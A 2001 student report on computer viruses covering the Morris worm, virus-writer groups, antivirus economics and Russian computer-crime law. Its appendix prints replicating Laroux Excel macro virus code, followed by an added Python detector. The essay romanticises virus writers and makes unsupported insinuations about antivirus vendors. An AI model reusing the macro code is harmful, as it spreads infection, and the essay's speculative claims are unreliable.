Computer viruses
Chuvash State University
Economic faculty
Report
COMPUTER VIRUSES
Author:
student of EC-13-98
Eugene Ivanov
Cheboxary – 2001
CONTENTS
A bit of history
What is a computer virus?
Who writes computer viruses?
To whose advantage computer viruses are written?
A legal notice. Penal Code of Russian Federation
Synopsis
SOURCES
Appendix
A bit of history
On 2 November 1988 Robert Morris Jr., a graduate student of the informatics
faculty of Cornell University (USA), infected a great number of computers
connected to the Internet. This network unites machines of university
centres, private companies and government agencies, including the National
Aeronautics and Space Administration, as well as some military research
centres and labs.
The network worm struck 6200 machines, which made up 7.3% of the computers
on the network, and showed that UNIX is not safe either. Among those
damaged were NASA, Los Alamos National Lab, a US Navy research centre, the
California Institute of Technology, and the University of Wisconsin (200 of
300 systems). Spreading over the ARPANET, MILNET, Science Internet and
NSFNET networks, it practically put these networks out of action. According
to the "Wall Street Journal", the virus infiltrated networks in Europe and
Australia, where cases of computers being blocked were also registered.
Here are some recollections of participants in the event:
Symptom: hundreds or thousands of jobs start running on a Unix system
bringing response to zero.
Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.: SUNs) any
sendmail compiled with debug has this problem. This virus is spreading very
quickly over the Milnet. Within the past 4 hours, it has hit >10 sites
across the country, both Arpanet and Milnet sites. Well over 50 sites have
been hit. Most of these are "major" sites and gateways.
Method: Someone has written a program that uses a hole in SMTP Sendmail
utility. This utility can send a message into another program.
Apparently what the attacker did was this: he or she connected to
sendmail (i.e., telnet victim.machine 25), issued the appropriate debug
command, and had a small C program compiled. (We have it. Big deal.) This
program took as an argument a host number, and copied two programs – one
ending in VAX.OS and the other ending in SunOS – and tried to load and
execute them. In those cases where the load and execution succeeded, the
worm did two things (at least): spawn a lot of shells that did nothing but
clog the process table and burn CPU cycles; look in two places – the
password file and the internet services file – for other sites it could
connect to (this is hearsay, but I don't doubt it for a minute). It used
both individual .host files (which it found using the password file), and
any other remote hosts it could locate which it had a chance of connecting
to. It may have done more; one of our machines had a changed superuser
password, but because of other factors we're not sure this worm did it.
All of Vaxen and some of Suns here were infected with the virus. The
virus forks repeated copies of itself as it tries to spread itself, and the
load averages on the infected machines skyrocketed. In fact, it got to the
point that some of the machines ran out of swap space and kernel table
entries, preventing login to even see what was going on!
The virus also "cleans" up after itself. If you reboot an infected
machine (or it crashes), the /tmp directory is normally cleaned up on
reboot. The other incriminating files were already deleted by the virus
itself.
On 4 November the author of the virus, Morris, came to FBI headquarters in
Washington on his own. The FBI imposed a ban on all material relating to
the Morris virus.
On 22 January 1989 a jury found Morris guilty. Had the guilty verdict been
approved without modification, Morris would have been sentenced to 5 years
in prison and a fine of 250 000 dollars. However, Morris' attorney Thomas
Guidoboni immediately lodged a protest and sent all the papers to the
Circuit Court with a petition to overturn the court's decision... In the
end Morris was sentenced to 3 months in prison and a fine of 270 thousand
dollars, and in addition Cornell University suffered a heavy loss by
expelling Morris from its ranks. The author then had to take part in the
liquidation of his own creation.
What is a computer virus?
It is executable code able to reproduce itself. Viruses are an area of
pure programming and, unlike other computer programs, carry intelligent
functions for protection against being found and destroyed. They have to
fight for survival in the complex conditions of conflicting computer
systems. That's why they evolve as if they were alive.
Yes, viruses seem to be the only living organisms in the computer
environment, and one more of their main goals is survival. That is why they
may have complex encryption/decryption engines, which are indeed a sort of
standard for computer viruses nowadays, in order to carry out the processes
of duplication, adaptation and disguise.
It is necessary to differentiate between reproducing programs and Trojan
horses. Reproducing programs will not necessarily harm your system, because
their aim is to produce as many copies (or near-copies) of themselves as
possible, either by means of so-called agent programs or without their
help. In the latter case they are referred to as "worms".
Trojan horses, meanwhile, are programs aimed at causing harm or damage to
PCs. It is certainly common practice for them to be part of a
"tech-organism", but they have completely different functions.
That is an important point. Destructive actions are not an integral part
of a virus by default. However, virus writers allow the presence of
destructive mechanisms as active protection against their creations being
found and destroyed, as well as a response to society's attitude to
viruses and their authors.
As you see, there are different types of viruses, and they have already
been separated into classes and categories, for instance: harmless,
dangerous, and very dangerous. No destruction means a harmless virus,
tricks with system halts mean a dangerous one, and devastating destruction
means a very dangerous one.
But viruses are famous not only for their destructive actions, but also
for their special effects, which are almost impossible to classify. Some
virus writers suggest the following: funny, very funny, and sad or
melancholy (keeps silent and infects). But one should remember that special
effects must occur only after a certain number of infections. Users should
also be given a chance to restrict the execution of destructive actions,
such as deleting files or formatting hard disks. In that way a virus can be
considered a useful program, keeping a check on system changes and
preventing surprises such as deletion of files or wiping of hard disks.
It sounds quite heretical to say such words about viruses, which are
usually considered a disaster. The less a person understands about
programming and virology, the greater the influence that the possibility of
being infected with a virus will have on him. So let's consider the
creators of viruses as the best source.
Who writes computer viruses?
They are lone wolves or groups of programmers.
Although a lot of people think that writing a computer virus is hard, that
is not exactly so. Using special programs called "virus creators", even
beginners in the computer world can build their own viruses, each of which
will be a strain of some major virus. This is precisely the case with the
notorious virus "Anna Kournikova", which is actually a worm.
The aim of creating viruses in this way is pretty obvious: the author
wants to become well known all over the world and to show his powers.
However, the results of the attempt can be very sad (see "A bit of
history"); only real professionals can become famous and stay uncaught. A
good example is Dark Avenger. Yes, and it is yet another custom of
participants in "the scene" to take terrifying monikers (nicknames).
To write something really new and remarkable, a programmer should have
some extra knowledge and skills, for example:
1) good strategic thinking and intuition – once released, a virus and its
descendants live their own independent life in nearly unpredictable
conditions. Therefore the author must anticipate a lot of things;
2) splendid knowledge of the Assembler[1] language and the operating
system he writes for – the more mistakes there are in the virus, the
quicker it will be caught;
3) attention to detail and the skill to solve the most varied tactical
questions – one won't write a compact, satisfactorily working program
without these abilities;
4) a high professional discipline in order to join the preceding points
together.
A computer virus group is an informal non-profit organisation uniting
programmers who write viruses, regardless of their qualifications. Anyone
can become a member of the club if he creates viruses or studies them for
the purpose of creation and spreading.
The aims they pursue together may differ from those of a single virus
writer, although they usually also try to become as famous as possible. But
at the same time they may help beginning programmers in the field of
viruses and spread commented virus sources and descriptions of virus
algorithms.
One can't say that all of the group members write viruses in Assembler.
Actually, you don't have to know any computer language or write any program
code to become a member or a friend of the group. But programming in
Assembler is preferred; Pascal, C++ and other high-level languages are
considered humiliating. It does make sense, since programs written in
Assembler are much smaller (0.5-5 kb) and therefore more robust. On the
other hand, Assembler is quite difficult to understand, especially for
beginners. One has to think the way the computer does: all commands are
sent directly to the central processing unit of the PC.
There are computer virus groups all over the world, a few being more
successful than others. It may be pretty hard to get in contact with them,
since they are quite typical representatives of the computer underground
world, as are (free)wares groups. Sometimes, however, creating viruses can
become a respectable occupation bringing a constant income. After all, no
one but the author of a virus can provide valuable information on the way
it should be treated and cured.
To whose advantage computer viruses are written?
Copyleft (cl) is distribution of programs without registering the
software, i.e. using a cracked copy. The practice is widely used in the
territory of the former USSR even by medium and big companies, to say
nothing of ordinary users. This software is stolen, which involves criminal
responsibility (see the legal notice). One of the general values of our
culture is generosity, and you can't do anything about it. But freeware
lovers should at least know that continuing the practice could be risky.
That's the first use of computer viruses – as a sort of compensation to
software developers.
In the very same way, writing viruses usually does not bring profits to
the author, at least when the author of a virus and the author of its cure
are different people. The situation is quite different when they are the
same person, especially if that person manages to hide the double-dealing.
And that is the second advantage of computer viruses.
Yes, developers of antivirus software make money from selling their
remedy for a new virus widely hyped by the mass media. The agitation can
grow so strong that everyone dashes to buy antivirus protection against
even the most harmless virus. The usual behaviour of share indexes on stock
exchanges during a computer virus epidemic is to fall. However, the shares
of such companies as Symantec (which is famous for its Norton Antivirus)
will soar sky-high.
The tendency is especially significant in the world of the emerging New
Economy. This fancy term means an economy based on computer services as
the engine of development. The system exists in the United States. That is
why we hardly ever hear the names of Dow Jones and Standard & Poor's in the
mass media nowadays. Their place is occupied by the NASDAQ Composite index,
based on the National Association of Securities Dealers Automated
Quotations system. The index reflects the performance of high-tech
companies, the base of the New Economy.
We can't say for sure, but maybe in the near future the index will be
influenced more by computers themselves than by brokers and dealers on the
world's stock exchanges. IBM Corporation has recently presented its new
invention – an automated broker, which is in fact a mainframe (a very big
computer) with specialised software. It is a descendant of the mainframe
DeepBlue, well known for its skill at chess. Unfortunately, it seems that
bad times have come for the whole economy of the USA, which also means
problems for NASDAQ.
Nevertheless, the initiative of IBM should certainly be welcomed. Automated
brokers seem to understand the volatility of indexes much more quickly and
rationally than human beings. There is only one drawback to eliminate –
the problem of artificial intelligence. A machine can't think as a human
does.
Maybe computer viruses could be of some use here too. After all, the
flights to the Moon were simply a consequence of inventing new ways of
exterminating the civilian population during the Second World War
(ballistic rockets). A wish to kill people made a fantastic daydream become
reality within fifty years. The first computing machine was actively used
during the development of the first atomic bomb. So sometimes even very bad
things, much more dangerous than viruses (name at least one person who has
been the victim of a cruel computer virus), can greatly assist progress and
bring a greater profit.
A legal notice. Penal Code of Russian Federation
Chapter 28. Crimes in sphere of computer information
Article 272. Illegitimate access to computer information
1. Illegitimate access to computer information protected by law, i.e.
information on a machine-readable medium, in an electronic computing
machine (PC), a PC system or its network, if it causes the destruction,
blocking, modification or copying of information, or disruption of the
operation of the PC, PC system or its network, –
is punished by a fine of from two to five hundred times the minimum wage,
or in the amount of the salary or other income of the convicted person for
a period from two to five months, or by corrective works for a period from
six months to one year, or by deprivation of liberty for a term of up to
two years.
2. The same deed, performed by a group of persons by prior collusion, or
by an organised group, or by a person using their official position, as
well as by a person having access to the PC, PC system or its network, –
is punished by a fine of from five to eight hundred times the minimum
wage, or in the amount of the salary or other income of the convicted
person for a period from five to eight months, or by corrective works for
a period from one to two years, or by arrest for a period from three to six
months, or by deprivation of liberty for a term of up to two years.
Article 273. Creation, use and spreading of harmful programs for PC.
1. Making programs for PC, or making changes to existing programs,
undoubtedly bringing about unauthorised deletion, blocking, modification or
copying of information, or disruption of the operation of the PC, PC system
or its network, as well as the use or spreading of such programs or of
machine-readable media carrying such programs, –
is punished by deprivation of liberty for a term of up to three years with
a fine of from two to five hundred times the minimum wage, or in the amount
of the salary or other income of the convicted person for a period from two
to five months.
2. The same deeds, having caused grave consequences through negligence, –
are punished by deprivation of liberty for a term from three to seven
years.
Synopsis
The history of computer viruses began recently, but it has already become
legendary. Almost everyone knows a few awesome fables about these
creatures, but hardly anyone understands what a computer virus is.
A computer virus is executable code able to reproduce itself. Viruses are
an area of pure programming and, unlike other computer programs, carry
intelligent functions for protection against being found and destroyed.
They have to fight for survival in the complex conditions of conflicting
computer systems.
Viruses seem to be the only living organisms in the computer environment,
and one more of their main goals is survival. That is why they may have
complex encryption/decryption engines, which are indeed a sort of standard
for computer viruses nowadays, in order to carry out the processes of
duplication, adaptation and disguise.
Viruses are written by lone wolves or groups of programmers.
Using special programs called "virus creators", even beginners in the
computer world can build their own viruses. The aim of creating viruses in
this way is pretty obvious: the author wants to become well known all over
the world and to show his powers.
The results of the attempt can be very sad; only real professionals can
become famous and stay uncaught. To write something really new and
remarkable, a programmer should have some extra knowledge and skills.
A computer virus group is an informal non-profit organisation uniting
programmers who write viruses, regardless of their qualifications. Anyone
can become a member of the club if he creates viruses or studies them for
the purpose of creation and spreading. You don't have to know any computer
language or write any program code to become a member or a friend of the
group. Programming in Assembler is preferred; Pascal, C++ and other
high-level languages are considered humiliating.
There are computer virus groups all over the world, a few being more
successful than others. It may be pretty hard to get in contact with them,
since they are quite typical representatives of the computer underground
world, as are (free)wares groups. Sometimes, however, creating viruses can
become a respectable occupation bringing a constant income. After all, no
one but the author of a virus can provide valuable information on the way
it should be treated and cured.
Developers of antivirus software make money from selling their remedy for
a new virus widely hyped by the mass media. The agitation can grow so
strong that everyone dashes to buy antivirus protection against even the
most harmless virus. The usual behaviour of share indexes on stock
exchanges during a computer virus epidemic is to fall. However, the shares
of high-tech companies producing antivirus software will soar sky-high.
An epidemic of foot-and-mouth disease has overwhelmed Europe these days
(March 15, 2001). It seems that a vast economic crisis is breaking out in
America. World finance is doing its best to escape the worst.
A breakthrough in the development of artificial intelligence could prevent
NASDAQ from collapsing completely. The help may come from an unexpected
side...
But don't forget that the creation, use and spreading of harmful programs
for PC is a criminal offence, as is using cracked versions of programs. Our
penal code establishes a punishment of up to seven years in jail.
And be aware that computer viruses have come for a long time, if not
forever.
SOURCES
1. Penal Code of Russian Federation
2. Bezrukov N.N. Computer virology. Part 1: General principles of
operation, categorization and catalogue of the most widespread viruses in
operating system MS DOS. – Kiev, 1990.
3. Infected Voice. Issue 1, September, 1994. – STEALTH group.
4. Infected Voice. Issue 2, October, 1994. – STEALTH group.
5. Infected Voice. Issue 3, December, 1994. – STEALTH group.
Appendix
A fragment of a macro virus (Laroux), written in a high-level computer
language (Excel Visual Basic)
Attribute VB_Name = "laroux"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
Sheets("laroux").Visible = True
Sheets("laroux").Select
Sheets("laroux").Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" &
"PERSONAL.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("laroux").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "personal.xls!check_files"
Case 1
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).Name
If s$ <> "laroux" Then
Workbooks("PERSONAL.XLS").Sheets("laroux").Copy
before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("laroux").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "personal.xls!check_files"
Case Else
End Select
End Sub
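Seen from the defender's side, the fragment above can be reduced to a few static markers. The following Python check is an added example, not part of the original report: it scans exported VBA module text for the constructs visible in the fragment (auto-run entry point, OnSheetActivate hook, a copy saved as PERSONAL.XLS in the startup path, a copied and hidden sheet). The rule names, verdict labels and both sample inputs are assumptions of this example.

```python
import re

# Rules mirror constructs in the fragment; names and verdict labels are hypothetical.
RULES = {
    "auto_run_entry": re.compile(r"^\s*sub\s+auto_(open|close)\s*\(", re.I),
    "event_hook": re.compile(r'application\.onsheetactivate\s*=\s*"[^"]+"', re.I),
    "startup_path": re.compile(r"application\.startuppath", re.I),
    "personal_xls": re.compile(r"personal\.xls", re.I),
    "saveas": re.compile(r"\.saveas\b", re.I),
    "sheet_copy": re.compile(r"sheets\([^)]*\)\.copy\b", re.I),
    "sheet_hidden": re.compile(r"sheets\([^)]*\)\.visible\s*=\s*false", re.I),
}

def strip_comment(line):
    # Cut a VBA ' comment, ignoring apostrophes inside string literals.
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def logical_lines(source):
    # Yield (first_line_no, code), joining VBA " _" line continuations.
    buf, start = "", 0
    for no, raw in enumerate(source.splitlines(), 1):
        start = start or no
        if raw.rstrip().endswith(" _"):
            buf += raw.rstrip()[:-1]      # drop the underscore, keep the space
            continue
        code = strip_comment(buf + raw.rstrip())
        if code.strip():
            yield start, code
        buf, start = "", 0

def scan(source):
    hits = {}                             # {rule_name: [line numbers]}
    for no, code in logical_lines(source):
        for name, rx in RULES.items():
            if rx.search(code):
                hits.setdefault(name, []).append(no)
    return hits

def classify(hits):
    found = set(hits)
    persists = {"startup_path", "personal_xls", "saveas"} <= found
    triggers = bool({"auto_run_entry", "event_hook"} & found)
    spreads = {"sheet_copy", "sheet_hidden"} <= found
    if triggers and persists and spreads:
        return "replicating-macro pattern"
    return "suspicious" if triggers and (persists or spreads) else "no match"

# Constructed excerpt of lines from the fragment above (not a working macro).
SUSPECT = r'''Sub auto_open()
Application.OnSheetActivate = "check_files"
Sheets("laroux").Copy
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & _
"PERSONAL.XLS", FileFormat:=xlNormal
Workbooks(n4$).Sheets("laroux").Visible = False'''
# Constructed benign macro: auto-run only, sheet copy only in a comment, hook cleared.
BENIGN = '''Sub auto_open()
' Sheets("laroux").Copy
Application.OnSheetActivate = ""'''
```

A single marker, such as an auto-run entry point on its own, is common in legitimate workbooks; the verdict depends on trigger, persistence and copying appearing together.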
-----------------------
[1] Assembler – a low-level, hardware-oriented computer language